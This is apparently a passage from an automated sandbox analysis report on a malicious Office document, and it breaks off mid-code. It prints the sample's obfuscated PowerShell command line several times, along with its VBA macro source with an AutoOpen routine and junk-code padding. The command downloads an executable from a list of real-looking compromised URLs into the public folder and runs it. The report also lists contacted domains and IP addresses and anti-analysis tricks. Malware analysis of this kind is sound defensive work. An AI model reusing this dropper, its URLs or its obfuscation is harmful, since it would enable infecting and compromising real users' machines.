.'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC'
[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106)
[cHar]124))") - source
- Monitored Target
- relevance
- 10/10
-
Invokes a process with a very long commandline
- details
-
"Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=o^w&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=e^r&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))" on 2018-5-17.14:53:49.766, "powershell ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC'
[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106)
[cHar]124))" on 2018-5-17.14:53:49.866 - source
- Monitored Target
- relevance
- 10/10
-
Contains embedded VBA macros with suspicious keywords
-
Informative 21
-
Anti-Reverse Engineering
-
Creates guarded memory regions (anti-debugging trick to avoid memory dumping)
- details
- "powershell.exe" is allocating memory with PAGE_GUARD access rights
- source
- API Call
- relevance
- 10/10
-
Creates guarded memory regions (anti-debugging trick to avoid memory dumping)
-
Environment Awareness
-
Tries to sleep for a long time (more than two minutes)
- details
- "powershell.exe" sleeping for "1566804069" milliseconds
- source
- API Call
- relevance
- 10/10
-
Tries to sleep for a long time (more than two minutes)
-
External Systems
-
Detected Suricata Alert
- details
- Detected alert "ET INFO EXE - Served Attached HTTP" (SID: 2014520, Rev: 6, Severity: 3) categorized as "Misc activity"
- source
- Suricata Alerts
- relevance
- 10/10
-
Detected Suricata Alert
-
General
-
Contacts domains
- details
- "ifcingenieria.cl"
- source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
-
"138.0.120.12:80"
"37.120.170.231:443"
"81.21.67.85:8080" - source
- Network Traffic
- relevance
- 1/10
-
Contains embedded VBA macros
- details
-
File "zTZADLcFXJtFRE.cls" (Streampath: "Macros/VBA/zTZADLcFXJtFRE") has code: "Sub GuJqoJ(uIvtS)fWYTPG = NfmOGUlKuOr = (zhISt / MKOVL / 95319 / Fix(lQzuPm)) + 9692 - CLng(kbHukT + CLng(4429)) + jNjBO + 98203 * NFaHud - CStr(97948) / aQNjq / CLng(QicmVO)End SubSub BYJoK(iIfwim)lopfK = mRhiWLjTjDO = (krMhQS / nTBuUj / 93344 / Fix(zbozb)) + 30534 - CLng(oTumDw + CLng(10735)) + YbhlC + 51901 * GZMaR - CStr(34687) / mJmoo / CLng(ruGmcH)sndOl = IcSnzuaUPkBz = (YhkAP / VUiVu / 17946 / Fix(YjTvzp)) + 68463 - CLng(nTVot + CLng(83577)) + WfWli + 94338 * LCdzbM - CStr(77145) / ztozYt / CLng(TmLOA)NOLVSL = wzIiztQSwOW = (pWcAt / QULja / 31136 / Fix(uzoSdI)) + 1963 - CLng(zwkJCf + CLng(47063)) + Bnzrfu + 83935 * Kczvdm - CStr(30277) / OBwXcA / CLng(FVfqX)End SubSub qrnrjK(cYQzFC)BIFNM = CvBjAJSsVAE = (tUkME / cTFpkw / 33776 / Fix(sUwQSd)) + 79918 - CLng(vpGqaI + CLng(57392)) + CQvmIm + 31019 * BTjOwF - CStr(31977) / jjIzvF / CLng(aiDYuF)STqVn = DfRGEPwtbt = (ZZHrAj / ziUIEO / 40786 / Fix(nAQYaS)) + 93344 - CLng(ERCsuq + CLng(69061)) + DJiVjG + 52892 * Jjpli - CStr(44295) / rjKbz / CLng(CTYcvD)End SubSub Autoopen()On Error Resume NextwnuHwn = ujzKhwOucK = (hDKJkO / EAqJsl / 5329 / Fix(UWmhn)) + 92083 - CLng(TLjzt + CLng(46233)) + nYvRAW + 43627 * dJsLiE - CStr(6989) / GZfYb / CLng(IuXzPk)musHwkwosI (ZkVOXN + dowlFKYHb + Oalji)scpbMN = pcaOzuQAuA = (moDYX / LrlIjo / 97175 / Fix(uAjFwm)) + 3288 - CLng(KzJHO + CLng(37268)) + BNjkZ + 85160 * oDSdBW - CStr(57435) / wmPGJt / CLng(vzOFRi)End SubSub PPirZ(vzDYBB)cnSkf = dAWrIJRRiVU = (OhoCuJ / tlzjqE / 15825 / Fix(HIidZa)) + 1303 - CLng(sYaiA + CLng(36452)) + QiEamf + 76967 * XbizsD - CStr(76827) / DBrJJ / CLng(suAOb)dUbwaH = AmiVCTHCqcI = (EXXjJ / UMqJZ / 47277 / Fix(rHDzm)) + 43266 - CLng(XnOYfp + CLng(79591)) + wpDXFY + 85293 * wumRn - CStr(37047) / cEwwc / CLng(DDEGY)RIwBUU = QAGBSfBGFzFz = (cmTiq / WtmzR / 64639 / Fix(bzwtSw)) + 9583 - CLng(KWCdS + CLng(55894)) + wwEBa + 52647 * WiSdHL - CStr(43980) / GklmX / CLng(ILhIs)End SubSub SQQFY(HwnuQG)mbTbo = tjvPSsFLomXs = (aWGNNF / DaaMU / 58582 / Fix(lcoks)) + 36527 - CLng(UWAwMr + CLng(59451)) + IBWXYr + 30228 * FOjSp - CStr(11483) / DzOMT / CLng(ACfZjF)End Sub"
File "FPAOsHRZpzGcVH.bas" (Streampath: "Macros/VBA/FPAOsHRZpzGcVH") has code: "Sub VIAJOC(BwfLOI)qwplPP = NVahnvAIjza = (hWYZq / HNCjjs / 18890 / Fix(zwQqFr)) + 83688 - CLng(nabaH + CLng(70764)) + qvNnq + 33935 * ZPvSI - CStr(55930) / mtpiU / CLng(Brsri)End SubFunction dowlFKYHb()On Error Resume NextZiwzPq = NMnTFJfZBv = (jOwBhm / mWzwDV / 9332 / Fix(skaSf)) + 53531 - CLng(PwwZkK + CLng(21676)) + bqwEzL + 54722 * RKTDzO - CStr(26130) / zACQuz / CLng(QLzwzD)csvhf = QZIMrHREbSi = (tsimY / KURAv / 58378 / Fix(irUEH)) + 78375 - CLng(LbpUXX + CLng(3634)) + zllLr + 7465 * duGXL - CStr(39646) / wZNiU / CLng(azAUd)tMMvPYQ = wQpJm("t.mU9+mU9u.oc.yelmU9+mU9admU9+mU9htimU9+mU9emU9+mU9kmU9+mU9//mU9+mU9:mU9+mU9ptmU9+mUW3mZ", 19335 + 5 - 19335, 19335 + 82 - 19335)wSCNOA = BUjPjSfOZzj = (SwdQGp / ciCkQ / 66436 / Fix(Hkajs)) + 43061 - CLng(TuRKiv + CLng(4753)) + MXCkzX + 231 * mHZwrS - CStr(34467) / wAmLvn / CLng(FNmzBL)HsMznz = LKiaZZlhupXA = (bLzFvh / YwOzvi / 67115 / Fix(lmVnV)) + 79349 - CLng(ZufjfW + CLng(25988)) + lSDEfj + 29026 * sPkmLT - CStr(55580) / rDjvIT / CLng(iwAlCa)LshKN = wQpJm(".EMZQ9tm'+'U9+mU9cmU9+mU9udm'+'U9+mU9omU9+mU9rp/emU9+mU9gamU9+mU9mmU9+mU9i/'+'wt.moc.smU9+mU9o'+'mU9+mU9tmU9+mU9ada", 11928 + 2 - 11928, 11928 + 109 - 11928)BTLEd = riDVWsXlCQGR = (scnSl / iZHfv / 24714 / Fix(jNQbG)) + 80302 - CLng(mMANYP + CLng(82968)) + tujfk + 46983 * ZjsTM - CStr(93894) / WXZJY / CLng(JUbKQT)jBihNL = oaCbzNwVTSGI = (PFHVrL / HJhvsO / 18327 / Fix(GwRUlT)) + 38864 - CLng(bOZZs + CLng(14552)) + XkRCR + 92432 * LWzDh - CStr(32905) / fEwpA / CLng(VAmWL)cwAkETD = wQpJm("w0mU9;)CDSAxmU9+m'+'U91
mU9+mU9)(pmU9+mU9e9mU9+mU9gNDtfiDtfrtSoTpmUlqsv", 29734 + 5 - 29734, 29734 + 66 - 29734)ljGSmk = tKLaLsjmvUh = (DwvJak / suWwvr / 42585 / Fix(rEDNS)) + 64402 - CLng(KUdmw + CLng(99052)) + iFRoZr + 75367 * zrBsHw - CStr(76000) / fUWrs / CLng(rHPEfn)oCahOj = HjokjBVZSKq = (awnkY / QwQPtH / 11663 / Fix(vWmWIz)) + 15974 - CLng(oIGYv + CLng(17090)) + OiQjK + 15385 * OpJOTr - CStr(81761) / vccWU / CLng(nwCswQ)ANzhp = wQpJm("wCGctacmU9+mU9};kmU9+mU9aerbmU9+mU'+'9;)mU9+mU9'+'CDmU9+mU9SmU9+mU9AxmU9+mU91(mU9+mU9)JQOmemU9+mU9tImU9+mU9-emU9+mU9JQO+JmU9+mU9QOk'+'JQO+JQmU9+mU9OovmU9+mU9nImU9+mU9JQO(&mU9+'+'C@9W", 52910 + 5 - 52910, 52910 + 175 - 52910)idAEH = CjcXvWHwMti = (TUNdv / oLbmO / 81963 / Fix(rjjLJ)) + 20646 - CLng(DonTF + CLng(64738)) + QrrjI + 27736 * wnRAEf - CStr(36711) / atNhji / CLng(YkDiS)lZMhf = XfzUiiEUGNS = (YjGiLq / fbTvhr / 63518 / Fix(RBovr)) + 16916 - CLng(ldULG + CLng(66071)) + cMJmV + 88738 * irAqs - CStr(82894) / LEnrvU / CLng(TSRaTQ)EoHkR = wQpJm("5FZ9thmU9'+'+mU9@/'+'omU9+mU9qmU9'+'+mU94mU9+mU9j6'+'mU9+mU97mU9+mU9/lmU9+mU9cmU9+mU9.aimU9+mU9reimU9+mU9negnimU9+mU9cfmU9+mU9i//:mU9+mU9ptth mU9+mU9 mU'+'90uC", 26023 + 4 - 26023, 26023 + 153 - 26023)cNAkEM = HlvWmoKnFzRN = (ZhUKO / JtsLBi / 52084 / Fix(dAGoi)) + 93274 - CLng(TrUIj + CLng(98240)) + iMbBC + 40466 * fjZqf - CStr(80549) / skUIN / CLng(jnwKmQ)BQrOHf = MZvXvabURH = (VtdUbt / jrAmZj / 16952 / Fix(mumSb)) + 37858 - CLng(CuazXQ + CLng(19306)) + ljBFn + 91155 * wQUbv - CStr(52000) / mVrmf / CLng(hhwfOl)aYofqzcWsE = wQpJm("WWJRAHC'+'[+1'+'01]RAHC['+'+75]RAH'+'C[( eCAlpEr-69]iw.", 41226 + 4 - 41226, 41226 + 50 - 41226)itbVQZ = OCYaVczWzzY = (rIFHk / VhDkVr / 4385 / Fix(pCpwL)) + 41532 - CLng(wkwRRD + CLng(49353)) + LBjpcA + 50890 * TlfEvL - CStr(34057) / jSYZv / CLng(wnCKuX)kdwFL = HTRkCJzPSzwM = (FCTUlV / zRqbcE / 81917 / Fix(mKNpF)) + 5216 - CLng(OLLwBP + CLng(39254)) + vhwPNh + 19710 * UqrJBb - CStr(17078) / EGccIl / CLng(GlLoI)wCffbz = wQpJm("I8lMrRAHC[,mU9'+'DtfmU9eCAlpEr- )mU9}'+'}'+'mU9+mU9{hCk", 17110 + 3 - 17110, 17110 + 48 - 17110)mTjcr = tfpdnctzNssn = (luvmr / JYpiC / 88107 / Fix(VhWIj)) + 20503 - CLng(PuPcoA + CLng(52883)) + JtsSAF + 44570 * XwlYmU - CStr(79997) / btaLL / CLng(EMhHnr)JuvDJF = PoiZunucGjYk = (sAAuv / dOqqEZ / 90260 / Fix(IVXbc)) + 23268 - CLng(KVDXnK + CLng(39074)) + woPbKQ + 87584 * IOYTBw - CStr(77544) / UtclG / CLng(IwYfhf)wdBSwU = wQpJm("
jcA+mU9 JQOx91JmU9+mU'+'9QmU9+mU'+'9O + c'+'imU9+mU9lbmU9+mU9upmU9+mU9:vnmU9+mU9emU9+mU9AmU9+mU9xmU9+mU91mU9+mU9 =mU9+mU9 '+'CDSAx1;)JQmU9+mU9O@JmU9+mU9QOmU9+mU9(tilpmU9+mU9SmU9+mUzjKEQ", 58872 + 6 - 58872, 58872 + 177 - 58872)XIWIor = owksPPMDtoM = (jDthiT / jTCfj / 26953 / Fix(lFBKMG)) + 75181 - CLng(WIkWjT + CLng(91490)) + fqVwNT + 28050 * aUcUVv - CStr(8709) / BbdHC / CLng(bGtDhl)jjNdYA = jmcSfwYzanJ = (quaRiC / dZitb / 8309 / Fix(pGVcXk)) + 55193 - CLng(NhHwRw + CLng(94753)) + XuHEz + 73123 * wvWfU - CStr(13185) / jqbEj / CLng(izPYU)cUuaIu = wQpJm("DF69+mU9emU9+mU99.cfmU9+mU9saAx'+'1(mU9+mU9p'+'e9elDtfIFdmU9+mU9aOmU9+mU9DtflnWmU9+m'+'U9DtfmU9+mU9omU9+mU9Dpe9.UYYmU9+mU9Ax1{ymU9+mU9rt{)XmU9+mU9CDAAmU9+mU9x1 nimU9+'+'mU9 cmUV2UY", 94876 + 5 - 94876, 94876 + 173 - 94876)hsJjlW = OGwUzuzYhBF = (mGwQW / Rfjaf / 66422 / Fix(AEQmLk)) + 17538 - CLng(sAlWcK + CLng(57507)) + FPNTM + 22368 * utMYEA - CStr(64062) / SlPuwh / CLng(VQvUtF)NTKLZ = XsjLjoqijIN = (DfjNjK / AoOCj / 54910 / Fix(bvPcwB)) + 69517 - CLng(dKTmYz + CLng(6402)) + GjmJwm + 64514 * aBAYi - CStr(56912) / iHzMuT / CLng(LLMJC)ZiFiTzufS = wQpJm("R7izc[
)901]raHc[+58]raHc[+75]raHc[(EcAlPer-)')mU9xmU9+]'+'43[eCrtf", 24238 + 5 - 24238, 24238 + 59 - 24238)uwmaw = HWuTopJBvBL = (zjpfZ / IfAUbz / 74975 / Fix(LLiOac)) + 86090 - CLng(HkoKW + CLng(62839)) + EQKAz + 6285 * ERMnoK - CStr(13755) / TVBGC / CLng(XjbjSd)HOsvr = TWGuWuwLApZ = (dwfUu / TckXY / 50269 / Fix(pKLZj)) + 21599 - CLng(ArsMn + CLng(14632)) + vFvmP + 78713 * RGbuz - CStr(88126) / UjwiU / CLng(EAmlU)dJWjr = wQpJm("76 ))421]raHc[,)601]raHc[+79]raHc[+45]raHc[( EcAlPer- 63]raHc[,'Ciu' EcaLperC- 93]raHLXuS", 47045 + 5 - 47045, 47045 + 83 - 47045)SNlESh = mYXolIFYEkfi = (jjIti / DLuSK / 33369 / Fix(WzfCIN)) + 20327 - CLng(zwuNZ + CLng(67532)) + jwCGmN + 66018 * dKoOja - CStr(57345) / iUYOF / CLng(BbSXJk)qDAuF = mVUSbiSqfOR = (cBJZh / SFtVwz / 83973 / Fix(pGjDU)) + 12607 - CLng(QTwzsI + CLng(28108)) + ZFGff + 26388 * hiTLn - CStr(83283) / zWSjJQ / CLng(GbuLK)UKjPWqjNw = wQpJm("07zsP$+]4[emOHsp$ ( .ta9.", 68412 + 5 - 68412, 68412 + 18 - 68412)hMcob = mUQrULnYFk = (SDXTZ / JwzGSi / 22342 / Fix(VCTUB)) + 58690 - CLng(jEZjiw + CLng(45702)) + doBqls + 13920 * OmwfcG - CStr(62350) / mjAqJ / CLng(DEGXj)sJmwrY = tvOwdEiPquj = (PbjQwu / WXmfQ / 4828 / Fix(MQnoGJ)) + 96537 - CLng(PSXZN + CLng(27968)) + IkwBO + 32621 * cWBwS - CStr(67353) / IjfaP / CLng(SbCoZs)ljaakrr = wQpJm("lH = mU9+mU9XCDAmU9+mU9Ax1;)'+'33128mU9+mU92mU9+mU'+'9 ,0mU9+mU90001mU9+mU9(txen.dmU9+mU9sadas'+'mU9+mU9nAm'+'U9+mU9xmU9+mU91 = BmU9+mU9SNmU9+mU9Ax1'+';tneilCbemU9+mU9W.teN.mU9+mU9memU9+mU9tsyS )JQmNCtf7f", 96976 + 7 - 96976, 96976 + 196 - 96976)LOsXhr = PCiPoSnRmJrP = (GiswwX / jiIbV / 39103 / Fix(OdiOa)) + 67680 - CLng(GAQmw + CLng(90704)) + KPiidz + 9773 * AZjUvj - CStr(38560) / nSzqYn / CLng(uQfrA)WNRNFU = ElpobiUFQp = (RdOvD / KRvcN / 57737 / Fix(NwjKAk)) + 12036 - CLng(UrcGw + CLng(55549)) + TuLru + 48287 * QHSNH - CStr(90228) / McXLJ / CLng(ZwJEj)ZWhhiPzoP = wQpJm(",6+mU9JQO8r%J", 65789 + 5 - 65789, 65789 + 7 - 65789)izmmpH = ozAQWjvjYsn = (LVHOEu / PwUlHL / 21729 / Fix(VdVdFi)) + 13173 - CLng(LLBcC + CLng(34370)) + ZQQDYI + 79548 * huTNr - CStr(56538) / JLXLa / CLng(DPhzE)RwuFU = ZiEuUQnJbJb = (CRfIM / ZqiNu / 94799 / Fix(budJS)) + 36836 - CLng(UbopsP + CLng(85342)) + QsAkaX + 69385 * lohwu - CStr(93580) / RKwBpT / CLng(AJqcr)UMWrAHbUn = wQpJm("icddrpmoHspCiu+]4[eMOhSpCi'+'u (.ja6 )63]RAHC['+',mU9Ax'+'1mU9 ecalpeRC- 93]R'+'AHC[,)47]RAH'+'C[+18]RAH'+'C[+97]RAHC[( '+' ecalpeRC-29]RAHC[,'+'mU9x'+'91mU9 eCAlpE'+'r'+'- 43]RAHC[,)211]c", 31058 + 2 - 31058, 31058 + 182 - 31058)dpQzOj = mNKWvrrVlUD = (fWfvN / YGsrt / 95438 / Fix(JZwXjj)) + 26507 - CLng(JEzaG + CLng(96275)) + SiYVYT + 89456 * KVjLI - CStr(36812) / WQZPhS / CLng(wBkqBW)fpApzI = kVYwUDhfMS = (MzGGK / bVBtd / 90430 / Fix(YYFGTa)) + 82260 - CLng(EwaNrZ + 